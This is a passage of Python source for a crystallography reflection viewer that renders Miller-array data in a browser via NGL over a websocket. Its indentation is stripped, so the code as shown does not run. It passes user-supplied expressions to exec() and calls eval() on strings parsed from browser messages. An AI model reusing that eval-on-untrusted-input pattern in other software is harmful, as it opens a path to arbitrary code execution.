newarray = millarr.deep_copy()
dres = newarray.unit_cell().d( newarray.indices() )
self.mprint("Creating new miller array through the operation:\n%s" %operation)
try:
ldic= {'dres': dres, 'array1': newarray, 'newarray': newarray }
exec(operation, globals(), ldic)
newarray = ldic.get("newarray", None)
return newarray
except Exception as e:
raise Sorry(str(e))
def OperateOn2MillerArrays(self, millarr1, millarr2, operation):
# lets the user specify a Python expression operating on millarr1 and millarr2
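# A hypothetical example (assuming cctbx-style miller arrays): passing
# operation = "newarray = array1.customized_copy(data=array1.data() - array2.data())"
# would yield the difference between the two arrays on their common reflections.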
matchindices = miller.match_indices(millarr1.indices(), millarr2.indices() )
matcharr1 = millarr1.select( matchindices.pairs().column(0) ).deep_copy()
matcharr2 = millarr2.select( matchindices.pairs().column(1) ).deep_copy()
dres = matcharr1.unit_cell().d( matcharr1.indices() )
newarray = matcharr2.deep_copy()
self.mprint("Creating new miller array through the operation:\n%s" %operation)
try:
ldic= { 'dres': dres, 'array1': matcharr1, 'array2': matcharr2, 'newarray': newarray }
exec(operation, globals(), ldic)
newarray = ldic.get("newarray", None)
return newarray
except Exception as e:
raise Sorry(str(e))
def get_colour_map_radii_power(self):
datatype = self.get_current_datatype()
if self.viewerparams.sigma_color_radius:
datatype = datatype + "_sigmas"
if datatype not in self.datatypedict.keys():
# ensure individual copies of datatypedefault and not references to the same
self.datatypedict[ datatype ] = self.datatypedefault[:]
colourscheme, colourpower, powerscale, radiiscale = \
self.datatypedict.get( datatype, self.datatypedefault[:] )
return colourscheme, colourpower, powerscale, radiiscale
def add_colour_map_radii_power_to_dict(self):
datatype = self.get_current_datatype()
if datatype is None:
return
if self.viewerparams.sigma_color_radius:
datatype = datatype + "_sigmas"
if datatype not in self.datatypedict.keys():
# ensure individual copies of datatypedefault and not references to the same
self.datatypedict[ datatype ] = self.datatypedefault[:]
self.datatypedict[datatype][0] = self.viewerparams.color_scheme
self.datatypedict[datatype][1] = self.viewerparams.color_powscale
self.datatypedict[datatype][2] = self.viewerparams.nth_power_scale_radii
self.datatypedict[datatype][3] = self.viewerparams.scale
def DrawNGLJavaScript(self, blankscene=False):
if not self.scene or not self.sceneisdirty:
return
if self.scene.points.size() == 0:
blankscene = True
if self.miller_array is None :
self.mprint( "Select a dataset to display reflections" )
blankscene = True
else:
self.mprint("Rendering reflections...")
h_axis = flex.vec3_double([self.scene.axes[0]])
k_axis = flex.vec3_double([self.scene.axes[1]])
l_axis = flex.vec3_double([self.scene.axes[2]])
self.unit_h_axis = 1.0/h_axis.norm() * h_axis
self.unit_k_axis = 1.0/k_axis.norm() * k_axis
self.unit_l_axis = 1.0/l_axis.norm() * l_axis
self.unit_normal_hk = self.unit_h_axis.cross( self.unit_k_axis )
self.unit_normal_kl = self.unit_k_axis.cross( self.unit_l_axis )
self.unit_normal_lh = self.unit_l_axis.cross( self.unit_h_axis )
self.normal_hk = h_axis.cross( k_axis )
self.normal_kl = k_axis.cross( l_axis )
self.normal_lh = l_axis.cross( h_axis )
maxnorm = max(h_axis.norm(), max(k_axis.norm(), l_axis.norm()))
l1 = self.scene.renderscale * maxnorm * 1.1
l2= self.scene.renderscale * maxnorm * 1.15
Hstararrowstart = roundoff( [-self.unit_h_axis[0][0]*l1, -self.unit_h_axis[0][1]*l1, -self.unit_h_axis[0][2]*l1] )
Hstararrowend = roundoff( [self.unit_h_axis[0][0]*l1, self.unit_h_axis[0][1]*l1, self.unit_h_axis[0][2]*l1] )
Hstararrowtxt = roundoff( [self.unit_h_axis[0][0]*l2, self.unit_h_axis[0][1]*l2, self.unit_h_axis[0][2]*l2] )
Kstararrowstart = roundoff( [-self.unit_k_axis[0][0]*l1, -self.unit_k_axis[0][1]*l1, -self.unit_k_axis[0][2]*l1] )
Kstararrowend = roundoff( [self.unit_k_axis[0][0]*l1, self.unit_k_axis[0][1]*l1, self.unit_k_axis[0][2]*l1] )
Kstararrowtxt = roundoff( [self.unit_k_axis[0][0]*l2, self.unit_k_axis[0][1]*l2, self.unit_k_axis[0][2]*l2] )
Lstararrowstart = roundoff( [-self.unit_l_axis[0][0]*l1, -self.unit_l_axis[0][1]*l1, -self.unit_l_axis[0][2]*l1] )
Lstararrowend = roundoff( [self.unit_l_axis[0][0]*l1, self.unit_l_axis[0][1]*l1, self.unit_l_axis[0][2]*l1] )
Lstararrowtxt = roundoff( [self.unit_l_axis[0][0]*l2, self.unit_l_axis[0][1]*l2, self.unit_l_axis[0][2]*l2] )
if not blankscene:
self.viewerparams.color_scheme, self.viewerparams.color_powscale, self.viewerparams.nth_power_scale_radii, \
self.viewerparams.scale = self.get_colour_map_radii_power()
# Make colour gradient array used for drawing a bar of colours next to associated values on the rendered html
mincolourscalar = self.HKLMinData_from_dict(self.colour_scene_id)
maxcolourscalar = self.HKLMaxData_from_dict(self.colour_scene_id)
if self.viewerparams.sigma_color_radius:
mincolourscalar = self.HKLMinSigmas_from_dict(self.colour_scene_id)
maxcolourscalar = self.HKLMaxSigmas_from_dict(self.colour_scene_id)
span = maxcolourscalar - mincolourscalar
ln = 120
incr = span/ln
colourgradarrays = []
val = mincolourscalar
colourscalararray = flex.double()
colourscalararray.append( val )
for j in range(ln):
val += incr
colourscalararray.append( val )
if self.HKLscene_from_dict(self.colour_scene_id).miller_array.is_complex_array():
# When displaying phases from map coefficients together with fom values
# compute colour map chart as a function of fom and phase values (x,y axis)
incr = 360.0/ln
val = 0.0
colourscalararray = flex.double()
colourscalararray.append( val )
for j in range(ln):
val += incr
colourscalararray.append( val )
fomarrays = []
COL = display.MplColorHelper(self.viewerparams.color_scheme, 0, 360)
rgbcolarray = flex.vec3_double( [ COL.get_rgb(d)[0:3] for d in colourscalararray ] )
if self.HKLscene_from_dict(self.colour_scene_id).isUsingFOMs():
fomln = 50
fom = 1.0
fomdecr = 1.0/(fomln-1.0)
for j in range(fomln):
fomarrays.append( flex.double(len(colourscalararray), fom) )
fom -= fomdecr
for j in range(fomln):
arr = graphics_utils.map_to_rgb_colourmap(
data_for_colors= colourscalararray,
colormap= rgbcolarray,
selection=flex.bool(colourscalararray.size(), True),
attenuation = fomarrays[j]
)
colourgradarrays.append( arr*256 )
else:
fomln =1
fomarrays = [1.0]
arr = graphics_utils.map_to_rgb_colourmap(
data_for_colors= colourscalararray,
colormap = rgbcolarray,
selection=flex.bool(colourscalararray.size(), True),
)
colourgradarrays.append( arr*256 )
else:
fomln = 1
fomarrays = [1.0]
COL = display.MplColorHelper(self.viewerparams.color_scheme, mincolourscalar, maxcolourscalar)
rgbcolarray = flex.vec3_double( [ COL.get_rgb(d)[0:3] for d in colourscalararray ])
arr = graphics_utils.map_to_rgb_colourmap(
data_for_colors= colourscalararray,
colormap = rgbcolarray,
selection=flex.bool(colourscalararray.size(), True),
powscale = self.viewerparams.color_powscale
)
colourgradarrays.append(arr*256)
colors = self.HKLscene_from_dict(self.colour_scene_id).colors
radii = self.HKLscene_from_dict(self.radii_scene_id).radii
self.meanradius = flex.mean(radii)
bin_labels_type_idx = self.bin_labels_type_idxs[self.params.binner_idx]
if blankscene:
points = flex.vec3_double( [ ] )
colors = flex.vec3_double( [ ] )
radii = flex.double( [ ] )
bin_labels_type_idx = self.bin_labels_type_idxs[0]
else:
points = self.scene.points
nrefls = points.size()
hkls = self.scene.indices
dres = self.scene.dres
if bin_labels_type_idx[0] =="Resolution":
colstr = "dres"
elif bin_labels_type_idx[0] =="Singletons":
colstr = "Singleton"
else:
if not blankscene:
colstr = self.HKLscene_from_dict(bin_labels_type_idx[2]).work_array.info().label_string()
data = self.scene.data
if not blankscene:
colourlabel = self.HKLscene_from_dict(self.colour_scene_id).colourlabel
fomlabel = self.HKLscene_from_dict(self.colour_scene_id).fomlabel
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
assert (colors.size() == radii.size() == nrefls)
self.colours = []
self.positions = []
self.radii2 = []
self.spbufttips = []
self.binvalsboundaries = []
if not blankscene:
if bin_labels_type_idx[0] =="Resolution":
self.binvalsboundaries = self.binvals
self.bindata = 1.0/self.scene.dres
elif bin_labels_type_idx[0] =="Singletons":
self.binvalsboundaries = self.binvals
self.bindata = self.scene.singletonsiness
else:
dummy, self.binvalsboundaries = self.get_matched_binarray(self.params.binner_idx)
self.binvalsboundaries.extend( self.binvals )
self.binvalsboundaries.sort()
if self.binvalsboundaries[0] < 0.0:
self.binvalsboundaries.append(0.0)
self.binvalsboundaries.sort()
self.bindata = self.MatchBinArrayToSceneArray()
self.nbinvalsboundaries = len(self.binvalsboundaries)
# avoid resetting opacities of bins unless we change the number of bins
if self.oldnbinvalsboundaries != self.nbinvalsboundaries:
self.ngl_settings.bin_opacities = str([ (1.0, e) for e in range(self.nbinvalsboundaries + 1) ])
self.oldnbinvalsboundaries = self.nbinvalsboundaries
# Un-binnable data are scene data values where there are no matching reflections in the bin data
# Put these in a separate bin and be diligent with the book keeping!
for ibin in range(self.nbinvalsboundaries+1): # adding the extra bin for un-binnable data
self.colours.append([]) # colours and positions are 3 x size of data()
self.positions.append([])
self.radii2.append([])
self.spbufttips.append([])
def data2bin(d, binvalsboundaries, nbinvalsboundaries):
if math.isnan(d): # NaN values are un-binnable. Tag them for an additional last bin
return nbinvalsboundaries
for ibin, binval in enumerate(binvalsboundaries):
if (ibin+1) == nbinvalsboundaries:
return ibin
if d > binval and d <= binvalsboundaries[ibin+1]:
return ibin
raise Sorry("data2bin: Should never get here")
def getprecision(v1,v2):
diff = abs(v1-v2); precision = 1; e = 1
while diff*e < 1.0:
e *= 10
precision += 1
return precision
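# e.g. getprecision(2.0, 2.5) returns 2, since one decimal place is enough to
# tell the two values apart when they are formatted.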
if nrefls > 0 and self.bindata.size() != points.size():
raise Sorry("Not the same number of reflections in bin-data and displayed data")
start_time = time.time()
for i, hklstars in enumerate(points):
# bin currently displayed data according to the values of another miller array
ibin = data2bin( self.bindata[i], self.binvalsboundaries, self.nbinvalsboundaries )
self.positions[ibin].extend( graphics_utils.flt_roundoffvec3(hklstars, 2) )
self.colours[ibin].extend( graphics_utils.flt_roundoffvec3(colors[i], 2) )
self.radii2[ibin].append( graphics_utils.flt_roundoff(radii[i], 2) )
self.spbufttips[ibin].append( i )
elapsed_time = time.time() - start_time
self.mprint("elapsed time: %s" %elapsed_time, verbose=2)
spherebufferstr = self.colstraliases
cntbin = 0
self.binstrs = []
self.bin_infotpls = []
if self.nuniqueval < self.params.nbins:
self.mprint("%d bins was requested but %s data has only %d unique value(s)!" %(self.params.nbins, colstr, self.nuniqueval), 0)
for ibin in range(self.nbinvalsboundaries+1):
mstr =""
nreflsinbin = len(self.radii2[ibin])
if nreflsinbin == 0:
continue
bin2 = float("nan"); bin1= float("nan") # indicates un-binned data
if ibin == self.nbinvalsboundaries:
mstr= "bin[%d] has %d reflections with no %s values (assigned to %2.3f)" %(cntbin, nreflsinbin, \
colstr, bin1)
precision = 3
if ibin < (self.nbinvalsboundaries-1):
bin1 = self.binvalsboundaries[ibin]
bin2 = self.binvalsboundaries[ibin+1]
bin3 = bin2
if ibin < (self.nbinvalsboundaries-2):
bin3= self.binvalsboundaries[ibin+2]
if colstr=="dres":
bin1= 1.0/self.binvalsboundaries[ibin]
bin2= 1.0/self.binvalsboundaries[ibin+1]
if ibin < (self.nbinvalsboundaries-2):
bin3= 1.0/self.binvalsboundaries[ibin+2]
#calculate precision by comparing a bin value with bin value below and above it
prec1 = getprecision(bin1, bin2)
prec2 = prec1
if bin2 != bin3:
prec2 = getprecision(bin3, bin2)
precision = max(prec1, prec2)
# format bin values string with necessary decimal places (precision)
binformatstr = "]%2." + str(precision) + "f; %2." + str(precision) + "f]"
mstr= "bin[%d] has %d reflections with %s in " %(cntbin, nreflsinbin, colstr)
mstr += binformatstr %(bin1, bin2)
self.bin_infotpls.append( roundoff((nreflsinbin, bin1, bin2 ), precision) )
self.binstrs.append(mstr)
self.mprint(mstr, verbose=1)
cntbin += 1
if self.ngl_settings.bin_opacities == "":
self.ngl_settings.bin_opacities = str([ (1.0, e) for e in range(cntbin) ])
self.SendInfoToGUI( { "bin_opacities": self.ngl_settings.bin_opacities,
"bin_infotpls": self.bin_infotpls,
"binner_idx": self.params.binner_idx,
"tooltip_opacity": self.ngl_settings.tooltip_alpha
} )
colourgradstr = []
if not blankscene:
self.calc_rotation_axes()
nvaluelabels = int(ln/self.viewerparams.ncolourlabels )
colourgradstrs = []
# if displaying phases from map coefficients together with fom values then
for g,colourgradarray in enumerate(colourgradarrays):
self.colourgradientvalues = []
for j,e in enumerate(colourgradarray):
self.colourgradientvalues.append( [colourscalararray[j], e] )
self.colourgradientvalues = roundoff( self.colourgradientvalues )
fom = fomarrays[g]
colourgradstr = []
for j,val in enumerate(self.colourgradientvalues):
vstr = "null"
alpha = 1.0
rgb = (int(val[1][0]), int(val[1][1]), int(val[1][2]) )
if j % nvaluelabels == 0 or j==(len(self.colourgradientvalues)-1) :
vstr = roundoff(val[0], 2)
colourgradstr.append([vstr, rgb[0], rgb[1], rgb[2] ])
colourgradstrs.append(colourgradstr)
if not self.WBmessenger.browserisopen:
self.ReloadNGL()
if not blankscene:
self.RemoveStageObjects()
for ibin in range(self.nbinvalsboundaries+1):
nreflsinbin = len(self.radii2[ibin])
if nreflsinbin == 0:
continue
self.SetBrowserDebug(str(self.verbose>=2).lower())
self.SetFontSize(self.ngl_settings.fontsize)
self.DefineHKL_Axes(str(Hstararrowstart), str(Hstararrowend),
str(Kstararrowstart), str(Kstararrowend),
str(Lstararrowstart), str(Lstararrowend),
Hstararrowtxt, Kstararrowtxt, Lstararrowtxt )
self.SendCoordinates2Browser(self.positions[ibin], self.colours[ibin],
self.radii2[ibin], self.spbufttips[ibin] )
self.RenderStageObjects()
self.MakeColourChart(10, 10, colourlabel, fomlabel, colourgradstrs)
if self.WaitforHandshake():
nwait = 0
while self.viewmtrx is None and nwait < self.handshakewait:
time.sleep(self.sleeptime)
nwait += self.sleeptime
self.GetClipPlaneDistances()
self.GetBoundingBox()
self.OrigClipFar = self.clipFar
self.OrigClipNear = self.clipNear
self.SetMouseSpeed( self.ngl_settings.mouse_sensitivity )
if self.isnewfile:
self.SetAutoView()
self.isnewfile = False
self.sceneisdirty = False
self.lastscene_id = self.viewerparams.scene_id
def ProcessBrowserMessage(self, message):
try:
if sys.version_info[0] > 2:
ustr = str
else:
ustr = unicode
if isinstance(message, bytes) and isinstance(self.lastmsg, ustr) and "Imageblob" in self.lastmsg:
self.mprint( "Saving image to file", verbose=1)
with open( self.imagename, "wb") as imgfile:
imgfile.write( message)
if isinstance(message, ustr) and message != "":
if "Orientation" in message:
self.ProcessOrientationMessage(message)
elif 'Received message:' in message:
self.mprint( message, verbose=2)
elif 'Browser: Got' in message:
self.mprint( message, verbose=2)
elif "websocket" in message:
self.mprint( message, verbose=1)
elif "Refreshing" in message or "disconnecting" in message:
self.mprint( message, verbose=1)
time.sleep(self.sleeptime)
elif "AutoViewSet" in message:
self.set_volatile_params()
elif "JavaScriptCleanUpDone:" in message:
self.mprint( message, verbose=1)
time.sleep(0.5) # time for browser to clean up
if not self.isnewfile:
self.WBmessenger.StopWebsocket()
elif "JavaScriptError:" in message:
self.mprint( message, verbose=0)
elif "Expand" in message:
self.mprint( message, verbose=2)
elif "Connection lost" in message:
self.mprint( message, verbose=1)
elif "Warning!: Web browser closed unexpectedly" in message:
self.mprint( message, verbose=1)
elif "Imageblob" in message:
self.mprint( "Image to be received", verbose=1)
elif "ImageWritten" in message:
self.mprint( "Image saved to file", verbose=0)
elif "ReturnClipPlaneDistances:" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
self.clipNear = flst[0]
self.clipFar = flst[1]
self.cameraPosZ = flst[2]
self.clipplane_msg_sem.release()
elif "ReturnBoundingBox:" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
self.boundingX = flst[0]
self.boundingY = flst[1]
self.boundingZ = flst[2]
self.boundingbox_msg_sem.release()
elif "ReturnMouseSpeed" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
if flst[0] is not None and not cmath.isnan(flst[0]):
self.ngl_settings.mouse_sensitivity = flst[0]
self.mousespeed_msg_sem.release()
elif "tooltip_id:" in message:
ttipids = eval(message.split("tooltip_id:")[1])
hklid, sym_id, is_friedel_mate = ttipids[0], ttipids[1], ttipids[2]
ttip = self.GetTooltipOnTheFly(hklid, sym_id, is_friedel_mate)
self.AddToBrowserMsgQueue("ShowThisTooltip", ttip)
elif "match_hkl_id:" in message:
match_ids = eval(message.split("match_hkl_id:")[1])
hklid, sym_id, is_friedel_mate = match_ids[0], match_ids[1], match_ids[2]
if self.sg.info().symbol_and_number() == self.miller_array.space_group().info().symbol_and_number():
self.make_visual_symHKLs(hklid, sym_id, is_friedel_mate)
self.visualise_sym_HKLs()
hkl = self.scene.indices[hklid]
hklmatches = miller.match_indices(self.parent.origarrays["HKLs"], [hkl])
orig_hkl_ids = list(hklmatches.pairs().column(0))
self.SendInfoToGUI( { "clicked_HKL": hkl, "orig_hkl_ids": orig_hkl_ids })
elif "onClick colour chart" in message:
self.onClickColourChart()
elif "SelectedBrowserDataColumnComboBox" in message:
sceneid = int(message.split(":")[1])
self.parent.SetScene(sceneid)
else:
if "Ready " in message:
self.mprint( message, verbose=5)
except Exception as e:
self.mprint( to_str(e) + "\n" + traceback.format_exc(limit=10), verbose=0)
self.lastmsg = message
def GetCameraPosRotTrans(self, viewmtrx):
lst = viewmtrx.split(",")
flst = [float(e) for e in lst]
ScaleRotMx = matrix.sqr( (flst[0], flst[4], flst[8],
flst[1], flst[5], flst[9],
flst[2], flst[6], flst[10]
)
)
cameratranslation = (flst[12], flst[13], flst[14])
self.mprint("translation: %s" %str(roundoff(cameratranslation)), verbose=3)
alllst = roundoff(flst)
self.mprint("""OrientationMatrix matrix:
%s, %s, %s, %s
%s, %s, %s, %s
%s, %s, %s, %s
%s, %s, %s, %s
Distance: %s
""" %tuple(alllst), verbose=4)
rotdet = ScaleRotMx.determinant()
if rotdet <= 0.0:
self.mprint("Negative orientation matrix determinant!!", verbose=1)
self.SetAutoView() # return old values as a fall back even if they're out of date
return self.cameraPosZ, self.currentRotmx, self.cameratranslation
else:
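# A pure rotation scaled uniformly by s has determinant s**3, so the camera
# distance is recovered as the cube root of the determinant.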
cameradist = math.pow(rotdet, 1.0/3.0)
self.mprint("Scale distance: %s" %roundoff(cameradist), verbose=3)
currentRotmx = matrix.identity(3)
if cameradist > 0.0:
currentRotmx = ScaleRotMx/cameradist
cameraPosZ = cameradist
return cameraPosZ, currentRotmx, cameratranslation
def ProcessOrientationMessage(self, message):
if self.viewerparams.scene_id is None or self.miller_array is None:
return
if message.find("NaN")>=0 or message.find("undefined")>=0:
return
if "OrientationBeforeReload:" in message:
if not self.isnewfile:
self.viewmtrx = message[ message.find("\n") + 1: ]
self.lastviewmtrx = self.viewmtrx
self.isnewfile = False
self.viewmtrx = message[ message.find("\n") + 1: ]
self.cameraPosZ, self.currentRotmx, self.cameratranslation = self.GetCameraPosRotTrans( self.viewmtrx)
rotlst = roundoff(self.currentRotmx.elems, 4)
self.mprint("""Rotation matrix:
%s, %s, %s
%s, %s, %s
%s, %s, %s
""" %rotlst, verbose=3)
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.fractionalization_matrix() )
InvMx = OrtMx.inverse()
# Our local coordinate system has x-axis pointing right and z axis pointing out of the screen
# unlike threeJS so rotate the coordinates emitted from there before presenting them
Xvec = matrix.rec([1,0,0] ,n=(1,3))
Yvec = matrix.rec([0,1,0] ,n=(1,3))
Zvec = matrix.rec([0,0,1] ,n=(1,3))
RotAroundYMx = matrix.sqr([-1.0,0.0,0.0, 0.0,1.0,0.0, 0.0,0.0,-1.0])
Xhkl = list(InvMx.transpose()*self.currentRotmx.inverse()* RotAroundYMx.transpose()* Xvec.transpose())
Yhkl = list(InvMx.transpose()*self.currentRotmx.inverse()* RotAroundYMx.transpose()* Yvec.transpose())
Zhkl = list(InvMx.transpose()*self.currentRotmx.inverse()* RotAroundYMx.transpose()* Zvec.transpose())
if self.debug:
self.SendInfoToGUI( { "StatusBar": "RotMx: %s, X: %s, Y: %s, Z: %s" \
%(str(roundoff(self.currentRotmx,4)), str(roundoff(Xhkl, 2)),
str(roundoff(Yhkl, 2)),
str(roundoff(Zhkl, 2))),
}
)
self.draw_vector(0,0,0, Zhkl[0],Zhkl[1],Zhkl[2], isreciprocal=True, label="Zhkl",
r=0.5, g=0.3, b=0.3, radius=0.1, labelpos=1.0)
self.draw_vector(0,0,0, Yhkl[0],Yhkl[1],Yhkl[2], isreciprocal=True, label="Yhkl",
r=0.5, g=0.3, b=0.3, radius=0.1, labelpos=1.0)
self.draw_vector(0,0,0, Xhkl[0],Xhkl[1],Xhkl[2], isreciprocal=True, label="Xhkl",
name="XYZhkl", r=0.5, g=0.3, b=0.3, radius=0.1, labelpos=1.0)
else:
self.SendInfoToGUI( { "StatusBar": "X: %s , Y: %s , Z: %s" %(str(roundoff(Xhkl, 2)),
str(roundoff(Yhkl, 2)),
str(roundoff(Zhkl, 2))),
} )
if "MouseMovedOrientation:" in message:
self.params.mouse_moved = True
if self.currentRotmx.is_r3_rotation_matrix():
# Round off matrix elements to avoid machine imprecision errors that might cast
# any matrix element into a number strictly larger than 1 which would
# crash r3_rotation_matrix_as_x_y_z_angles()
self.currentRotmx = matrix.sqr(roundoff(self.currentRotmx.elems, 8) )
angles = self.currentRotmx.r3_rotation_matrix_as_x_y_z_angles(deg=True)
self.mprint("angles: %s" %str(roundoff(angles)), verbose=3)
z_vec = flex.vec3_double( [(0,0,1)])
self.rot_zvec = z_vec * self.currentRotmx
self.mprint("Rotated cartesian Z direction : %s" %str(roundoff(self.rot_zvec[0])), verbose=3)
rfracmx = matrix.sqr( self.miller_array.unit_cell().reciprocal().fractionalization_matrix() )
self.rot_recip_zvec = self.rot_zvec * rfracmx
self.rot_recip_zvec = (1.0/self.rot_recip_zvec.norm()) * self.rot_recip_zvec
self.mprint("Rotated reciprocal L direction : %s" %str(roundoff(self.rot_recip_zvec[0])), verbose=3)
def WaitforHandshake(self, sec=5):
nwait = 0
while not self.WBmessenger.browserisopen:
time.sleep(self.sleeptime)
nwait += self.sleeptime
if nwait > sec:
return False
return True
def OpenBrowser(self):
if self.viewerparams.scene_id is not None and not self.WBmessenger.websockclient \
and not self.WBmessenger.browserisopen or self.isnewfile:
with open(self.hklfname, "w") as f:
f.write( self.htmlstr )
self.url = "file:///" + os.path.abspath( self.hklfname )
self.url = self.url.replace("\\", "/")
self.mprint( "Writing %s and connecting to its websocket client" %self.hklfname, verbose=1)
if self.UseOSBrowser=="default":
if not webbrowser.open(self.url, new=0):
self.mprint("Could not open the default web browser")
return False
if self.UseOSBrowser != "default" and self.UseOSBrowser != "":
browserpath = self.UseOSBrowser + " %s"
if not webbrowser.get(browserpath).open(self.url, new=0):
self.mprint("Could not open web browser, %s" %self.UseOSBrowser)
return False
self.SendInfoToGUI({ "html_url": self.url } )
self.WBmessenger.browserisopen = True
#self.isnewfile = False
return True
return False
def set_show_tooltips(self):
msg = "%s" %self.ngl_settings.show_tooltips
self.AddToBrowserMsgQueue("DisplayTooltips", msg)
def set_tooltip_opacity(self):
msg = "%f" %self.ngl_settings.tooltip_alpha
self.AddToBrowserMsgQueue("TooltipOpacity", msg)
def SetOpacities(self, bin_opacities_str):
retstr = ""
if self.miller_array and bin_opacities_str:
self.ngl_settings.bin_opacities = bin_opacities_str
bin_opacitieslst = eval(self.ngl_settings.bin_opacities)
for binopacity in bin_opacitieslst:
alpha = binopacity[0] # float(binopacity.split(",")[0])
bin = binopacity[1] # int(binopacity.split(",")[1])
retstr += self.set_opacity(bin, alpha)
self.SendInfoToGUI( { "bin_opacities": self.ngl_settings.bin_opacities } )
self.mprint( retstr, verbose=1)
def set_opacity(self, bin, alpha):
if bin > self.nbinvalsboundaries-1:
return "There are only %d bins present\n" %self.nbinvalsboundaries
msg = "%d, %f" %(bin, alpha)
self.AddToBrowserMsgQueue("alpha", msg)
return "Opacity %s set on bin[%s]\n" %(alpha, bin)
def RedrawNGL(self):
self.AddToBrowserMsgQueue("Redraw")
def ReloadNGL(self): # expensive as javascript may be several Mbytes large
self.mprint("Rendering JavaScript...", verbose=1)
if not self.OpenBrowser():
self.AddToBrowserMsgQueue("Reload")
def JavaScriptCleanUp(self, ):
self.AddToBrowserMsgQueue("JavaScriptCleanUp")
def ExpandInBrowser(self):
"""
Expansion of reflections stored in an asymmetric unit wedge defined by the spacegroup is
done by applying the rotation matrices defined by the spacegroup to the reflections.
Applying these matrices to all reflections is done much faster in WebGL in the browser.
Before sending the rotation matrices to the browser they are first converted into
cartesian coordinates.
"""
if self.sceneisdirty:
self.mprint( "Not expanding in browser", verbose=1)
return
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.orthogonalization_matrix())
InvMx = OrtMx.inverse()
msgtype = "Expand"
msg = ""
unique_rot_ops = []
if self.viewerparams.expand_to_p1:
msgtype += "P1"
unique_rot_ops = self.symops[ 0 : self.sg.order_p() ] # avoid duplicate rotation matrices
retmsg = "Expanding to P1 in browser"
if not self.miller_array.is_unique_set_under_symmetry():
retmsg += "\nNot all reflections are in the same asymmetric unit in reciprocal space.\n"
retmsg += "Some reflections might be displayed on top of one another.\n"
self.mprint( retmsg, verbose=1)
else:
unique_rot_ops = [ self.symops[0] ] # No P1 expansion. So only submit the identity matrix
if self.viewerparams.expand_anomalous and not self.miller_array.anomalous_flag():
msgtype += "Friedel"
self.mprint( "Expanding Friedel mates in browser", verbose=1)
for i, symop in enumerate(unique_rot_ops):
RotMx = matrix.sqr( symop.r().as_double())
ortrot = (OrtMx * RotMx * InvMx).as_mat3()
if RotMx.is_r3_identity_matrix():
# avoid machine precision rounding errors converting 1.0 to 0.99999999..
ortrot = (1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0)
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg += str_rot + "\n" # add rotation matrix to end of message string
self.AddToBrowserMsgQueue(msgtype, msg)
self.GetBoundingBox() # bounding box changes when the extent of the displayed lattice changes
def draw_sphere(self, s1, s2, s3, isreciprocal=True,
r=0, g=0, b=0, name="", radius = 1.0, mesh=False):
"""
Place sphere at [s1, s2, s3] with colour r,g,b. If name=="", the creation
is deferred until draw_sphere is eventually called with name != "". These
spheres are then joined in the same NGL representation.
"""
uc = self.miller_array.unit_cell()
vec = (s1*self.scene.renderscale, s2*self.scene.renderscale, s3*self.scene.renderscale)
#svec = list(vec)
if isreciprocal:
# uc.reciprocal_space_vector() only takes integer miller indices so compute the cartesian coordinates
# for floating valued miller indices with the transpose of the fractionalization matrix
vec = list( vec * matrix.sqr(uc.fractionalization_matrix()).transpose() )
svec = [ vec[0], vec[1], vec[2] ]
else: # real space fractional values
vec = list( vec * matrix.sqr(uc.orthogonalization_matrix()) )
vscale = 1.0/self.scene.renderscale
# TODO: find suitable scale factor for displaying real space vector together with reciprocal vectors
svec = [ vscale*vec[0], vscale*vec[1], vscale*vec[2] ]
self.draw_cartesian_sphere(svec[0], svec[1], svec[2], r, g, b, name, radius, mesh)
def draw_cartesian_sphere(self, s1, s2, s3, r=0, g=0, b=0, name="", radius = 1.0, mesh=False):
self.mprint("cartesian sphere is at: %s" %(str(roundoff([s1, s2, s3]))), verbose=2)
self.AddToBrowserMsgQueue("DrawSphere", "%s;; %s;; %s;; %s;; %s;; %s;; %s;; %s;; %s" \
%(s1, s2, s3, r, g, b, radius, name, int(mesh)) )
if name=="":
self.mprint("deferred rendering sphere at (%s, %s, %s)" %(s1, s2, s3), verbose=2)
def draw_vector(self, s1, s2, s3, t1, t2, t3, isreciprocal=True, label="",
r=0, g=0, b=0, name="", radius = 0.15, labelpos=0.8):
"""
Place vector from [s1, s2, s3] to [t1, t2, t3] with colour r,g,b and label.
If name=="", creation is deferred until draw_vector is eventually called with name != "".
These vectors are then joined in the same NGL representation.
"""
uc = self.miller_array.unit_cell()
vec1 = (s1*self.scene.renderscale, s2*self.scene.renderscale, s3*self.scene.renderscale)
vec2 = (t1*self.scene.renderscale, t2*self.scene.renderscale, t3*self.scene.renderscale)
#svec = list(vec)
if isreciprocal:
# uc.reciprocal_space_vector() only takes integer miller indices so compute the cartesian coordinates
# for floating valued miller indices with the transpose of the fractionalization matrix
vec1 = list( vec1 * matrix.sqr(uc.fractionalization_matrix()).transpose() )
vec2 = list( vec2 * matrix.sqr(uc.fractionalization_matrix()).transpose() )
svec1 = [ vec1[0], vec1[1], vec1[2] ]
svec2 = [ vec2[0], vec2[1], vec2[2] ]
else: # real space fractional values
vec1 = list( vec1 * matrix.sqr(uc.orthogonalization_matrix()) )
vec2 = list( vec2 * matrix.sqr(uc.orthogonalization_matrix()) )
vscale = 1.0/self.scene.renderscale
# TODO: find suitable scale factor for displaying real space vector together with reciprocal vectors
svec1 = [ vscale*vec1[0], vscale*vec1[1], vscale*vec1[2] ]
svec2 = [ vscale*vec2[0], vscale*vec2[1], vscale*vec2[2] ]
self.draw_cartesian_vector(svec1[0], svec1[1], svec1[2], svec2[0], svec2[1], svec2[2],
label, r, g, b, name, radius, labelpos)
def draw_cartesian_vector(self, s1, s2, s3, t1, t2, t3, label="", r=0, g=0, b=0, name="", radius = 0.15, labelpos=0.8):
self.mprint("cartesian vector is: %s to %s" %(str(roundoff([s1, s2, s3])), str(roundoff([t1, t2, t3]))), verbose=1)
self.AddToBrowserMsgQueue("DrawVector", "%s;;%s;;%s;;%s;;%s;;%s;;%s;;%s;;%s;;%s;;%s;;%s;;%s" \
